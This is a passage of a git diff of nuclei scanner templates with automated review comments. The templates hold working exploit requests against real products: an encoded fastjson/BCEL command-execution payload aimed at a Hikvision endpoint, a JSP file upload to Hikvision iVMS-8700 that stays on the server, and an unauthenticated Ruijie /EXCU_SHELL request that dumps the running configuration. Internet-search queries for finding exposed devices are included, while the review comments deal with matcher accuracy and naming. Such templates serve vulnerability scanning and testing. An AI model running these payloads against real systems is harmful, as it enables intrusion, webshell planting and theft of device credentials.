$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}} matchers: - type: word words: - - '{{randstr}}' + - "nt authority\\system" diff --git a/poc/upload/Hikvision_iVMS-8700_upload_action.yaml b/poc/upload/Hikvision_iVMS-8700_upload_action.yaml index 7e328a8b1b..7f081b05e0 100644 --- a/poc/upload/Hikvision_iVMS-8700_upload_action.yaml +++ b/poc/upload/Hikvision_iVMS-8700_upload_action.yaml 
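Review bot: The only matcher is the word `nt authority\\system`, so the template reports nothing when the `whoami` output is anything else — a Linux install (the sibling templates in this commit target `/opt/hikvision/.../tomcat85linux64.1`) answers `root` or a service account, and a Windows install running under a non-SYSTEM account is missed as well. Match the fact that the command ran rather than one particular user, e.g. `words: ["nt authority\\system", "root"]` with `condition: or`, or — if the gadget passes the `Testcmd` header through a shell, which cannot be confirmed from the encoded blob — `Testcmd: echo {{randstr}}` with `- '{{randstr}}'` as the word. `id: HIKVISION` is also the id of `Hikvision_iVMS-8700_upload_action.yaml` in this same commit, and nuclei treats duplicate ids as the same template, so give this one a distinct id such as `hikvision-applyct-fastjson-rce` and a `name` that says what it detects instead of the bare `HIKVISION`. The `description` should state that the request posts what looks like a fastjson `@type` / BCEL class-loading payload to `/bic/ssoService/v1/applyCT` and that the command in the `Testcmd` header is executed, since nothing in the template explains the blob.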
@@ -1,50 +1,48 @@ id: HIKVISION info: - name: HHIKVISION iVMS-8700 upload Webshell file - author: zerZero Trust Security Attack and Defense Laboratory + name: HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 upload Webshell file + author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file + HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 There is an arbitrary file upload vulnerability where attackers can control the server by sending specific request packets to upload Webshell files metadata: fofa-query: icon_hash="-911494769" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" variables: - str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' + str1: '{{rand_base(6)}}' + str2: '{{rand_base(6)}}' + str3: '<%out.print("{{str2}}");%>' http: - raw: - | - POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 + POST /eps/resourceOperations/upload.action HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 184 - Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 - - --c4155aff43901a8b2a19a4641a5efa15 - Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" + User-Agent: MicroMessenger + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj + + ------WebKitFormBoundaryTJyhtTNqdMNLZLhj + Content-Disposition: form-data; name="fileUploader";filename="{{str1}}.jsp" Content-Type: image/jpeg - {{randstr}} - --c4155aff43901a8b2a19a4641a5efa15-- + {{str3}} + ------WebKitFormBoundaryTJyhtTNqdMNLZLhj-- - | - GET /eps/upload/{{name}}.jsp HTTP/1.1 + GET /eps/upload/{{res_id}}.jsp HTTP/1.1 Host: {{Hostname}} extractors: - type: json - name: name + name: res_id json: - 
".data.resourceUuid"
internal: true
matchers:
- - type: word
- words:
- - '{{randstr}}'
+ - type: dsl
+ dsl:
+ - body_2 == str2
diff --git a/poc/upload/Ruijie_NBR_Router_fileupload.yaml b/poc/upload/Ruijie_NBR_Router_fileupload.yaml
index fa762ac2f6..f2db119795 100644
--- a/poc/upload/Ruijie_NBR_Router_fileupload.yaml
+++ b/poc/upload/Ruijie_NBR_Router_fileupload.yaml
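Review bot: `body_2 == str2` requires the fetched JSP's entire body to equal the six random characters, so any trailing newline or whitespace the container appends after the `<%out.print(...)%>` output turns a successful upload into a miss; `contains(body_2, str2)` keeps the random-marker check while tolerating that. The `User-Agent: MicroMessenger` header looks deliberate, presumably a client check the endpoint applies, and deserves a one-line comment such as `# MicroMessenger UA appears to be required by /eps/resourceOperations/upload.action — confirm` rather than reading as an arbitrary value. As with the other upload templates in this commit, the uploaded `{{str1}}.jsp` stays under `/eps/upload/` after the scan; say so in `description` so operators clean it up. `id: HIKVISION` duplicates the id used by `Hikvision_iVMS-8700_upload.yaml` here, so use a distinct one like `hikvision-ivms8700-upload-action-webshell`.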
@@ -1,37 +1,33 @@ id: Ruijie info: - name: Ruijie NBR Router fileupload.php Arbitrary File Upload Vulnerability + name: Ruijie Switch WEB Management System EXCU_ SHELL author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - Ruijie NBR router has an arbitrary file upload vulnerability in the fileupload.php file, which allows attackers to upload arbitrary files to the server and obtain server privileges + Ruijie Switch WEB Management System EXCU_ SHELL metadata: - fofa-query: app="Ruijie-NBR路由器" - hunter-query: web.title="锐捷网络 --NBR路由器--登录界面" + fofa-query: body="img/free_login_ge.gif" && body="./img/login_bg.gif" + hunter-query: web.body="img/free_login_ge.gif"&&body="./img/login_bg.gif" http: - raw: - | - POST /ddi/server/fileupload.php?uploadDir=../../321&name=test.php HTTP/1.1 + GET /EXCU_SHELL HTTP/1.1 Host: {{Hostname}} - Accept: text/plain, */*; q=0.01 - Content-Disposition: form-data; name="file"; filename="111.php" - Content-Type: image/jpeg + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.2852.74 Safari/537.36 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: close + Cmdnum: '1' + Command1: show running-config + Confirm1: n - - - | - GET /321/test.php HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 - req-condition: true matchers: - type: dsl dsl: - 'status_code_1 == 200' - - 'status_code_2 == 200' - - 'contains(body_1, "test.php")' - - 'contains(body_2, "PHP Version")' + - 'contains(body_1, "configuration")' condition: and
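Review bot: `contains(body_1, "configuration")` is a weak confirmation of command execution — the word occurs in ordinary web UI text, so a 200 from a page that is not command output can be reported as vulnerable — while the chosen command pulls the device's entire running configuration (local credentials, SNMP communities, ACLs) into scan output just to prove the endpoint works. Prefer a command with small, distinctive output if `/EXCU_SHELL` accepts it the same way (e.g. `show version` matched on its banner), or at least tighten the match to the header the device emits at the top of the config, which cannot be confirmed from here. The `description` is just the name repeated; it should say what the template does, e.g. `Unauthenticated GET to /EXCU_SHELL runs the CLI command given in the Command1 header (here show running-config); a 200 containing the configuration output confirms the flaw.` The file still lives at `Ruijie_NBR_Router_fileupload.yaml` with the generic `id: Ruijie` although it now tests a switch command-execution endpoint; rename both so the finding is not mislabelled as an NBR upload.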